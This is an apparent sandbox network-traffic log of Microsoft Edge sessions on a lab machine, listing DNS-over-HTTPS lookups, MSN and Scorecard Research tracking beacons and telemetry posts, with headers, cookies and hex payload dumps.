2025-01-09 13:42:35 UTC	1390	IN	Data Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>v
2025-01-09 13:42:35 UTC	1390	IN	Data Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 Data Ascii: =K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
2025-01-09 13:42:35 UTC	1390	IN	Data Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F\
2025-01-09 13:42:35 UTC	1390	IN	Data Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN1 Q9
2025-01-09 13:42:35 UTC	1390	IN	Data Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 Data Ascii: QNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49770	172.64.41.3	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:37 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-09 13:42:37 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: data-edgesmartscreenmicrosoftcom)@<
2025-01-09 13:42:37 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 09 Jan 2025 13:42:37 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ff4da024c8e438d-EWR alt-svc: h3=":443"; ma=86400
2025-01-09 13:42:37 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 03 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 0d fa 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 01 16 00 30 0f 70 72 6f 64 2d 61 67 69 63 2d 6e 63 75 2d 32 0e 6e 6f 72 74 68 63 65 6e 74 72 61 6c 75 73 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 73 00 01 00 01 00 00 00 0a 00 04 ac b7 c0 6d 00 00 29 04 d0 00 00 00 00 01 16 00 0c 01 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: data-edgesmartscreenmicrosoftcom&prod-atm-wds-edgetrafficmanagernetA0prod-agic-ncu-2northcentraluscloudappazure,sm)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49777	3.171.139.66	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:38 UTC	925	OUT	GET /b?rn=1736430155824&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0CF28CAF1D4764FC3C1D99C01CEF65B6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:42:38 UTC	955	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Thu, 09 Jan 2025 13:42:38 GMT Location: /b2?rn=1736430155824&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0CF28CAF1D4764FC3C1D99C01CEF65B6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=157707f961a726cd94781461736430158; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=157707f961a726cd94781461736430158; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 284ac69616559909913fa0f0502158ea.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK52-P8 X-Amz-Cf-Id: 8KPvlAzNmwaQSQqSG4EerhUikd458lBBZA1DPPsh2aWI_RHiSmrgCw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49776	20.110.205.119	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:38 UTC	1175	OUT	GET /c.gif?rnd=1736430155823&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8c5c06be53d4ef49888d26564492b1c&activityId=a8c5c06be53d4ef49888d26564492b1c&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1
2025-01-09 13:42:38 UTC	1108	IN	HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Location: https://c.bing.com/c.gif?rnd=1736430155823&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8c5c06be53d4ef49888d26564492b1c&activityId=a8c5c06be53d4ef49888d26564492b1c&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=23380C341E47475980EC0B27EFDB0DFE&RedC=c.msn.com&MXFR=0CF28CAF1D4764FC3C1D99C01CEF65B6 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; domain=.msn.com; expires=Tue, 03-Feb-2026 13:42:38 GMT; path=/; SameSite=None; Secure; Priority=High; Date: Thu, 09 Jan 2025 13:42:38 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49775	13.89.178.27	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:38 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430155821&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3857 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1
2025-01-09 13:42:38 UTC	3857	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 35 2e 38 31 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 65 36 31 30 34 35 37 2d 32 61 33 30 2d 34 66 66 63 2d 62 31 38 33 2d 39 61 62 63 32 64 38 64 32 66 34 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 37 39 34 33 31 35 36 34 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-09T13:42:35.817Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"ce610457-2a30-4ffc-b183-9abc2d8d2f42","epoch":"2794315646"},"app":{"locale
2025-01-09 13:42:38 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=a917e880b7ef4a43a5b45ef1f5e00c67&HASH=a917&LV=202501&V=4&LU=1736430158656; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:38 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=d0c27dad1f7a420e9b2c06bb6f69397c; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:38 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2835 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:42:37 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49787	3.171.139.66	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:39 UTC	1012	OUT	GET /b2?rn=1736430155824&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0CF28CAF1D4764FC3C1D99C01CEF65B6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=157707f961a726cd94781461736430158; XID=157707f961a726cd94781461736430158
2025-01-09 13:42:39 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Thu, 09 Jan 2025 13:42:39 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 5f9847e2035814141303960526e10e26.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK52-P8 X-Amz-Cf-Id: hI_HEsDU1kLM0AKNQgtXVHWbO-F4ucOc5YkJv_UV74h3-kJ-qOZXMg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49803	20.110.205.119	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:39 UTC	1279	OUT	GET /c.gif?rnd=1736430155823&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8c5c06be53d4ef49888d26564492b1c&activityId=a8c5c06be53d4ef49888d26564492b1c&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=23380C341E47475980EC0B27EFDB0DFE&MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; SM=T; _C_ETH=1; msnup=
2025-01-09 13:42:40 UTC	983	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT Accept-Ranges: bytes ETag: "dda11c98eb61db1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; domain=.msn.com; expires=Tue, 03-Feb-2026 13:42:40 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=0CF28CAF1D4764FC3C1D99C01CEF65B6; domain=c.msn.com; expires=Tue, 03-Feb-2026 13:42:40 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 16-Jan-2025 13:42:40 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 09-Jan-2025 13:52:40 GMT; path=/; SameSite=None; Secure; Date: Thu, 09 Jan 2025 13:42:39 GMT Connection: close Content-Length: 42
2025-01-09 13:42:40 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49801	13.89.178.27	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:40 UTC	1044	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158155&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 11398 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; _C_ETH=1; msnup=
2025-01-09 13:42:40 UTC	11398	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 38 2e 31 35 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 65 36 31 30 34 35 37 2d 32 61 33 30 2d 34 66 66 63 2d 62 31 38 33 2d 39 61 62 63 32 64 38 64 32 66 34 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 37 39 34 33 31 35 36 34 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:42:38.153Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"ce610457-2a30-4ffc-b183-9abc2d8d2f42","epoch":"2794315646"},"app":{"locale
2025-01-09 13:42:40 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=bb5401b7aedd4145ba68dcb0b0dfc5df&HASH=bb54&LV=202501&V=4&LU=1736430160112; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:40 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=5e40269829dd439c9c668c3ec883e760; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:40 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1957 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true 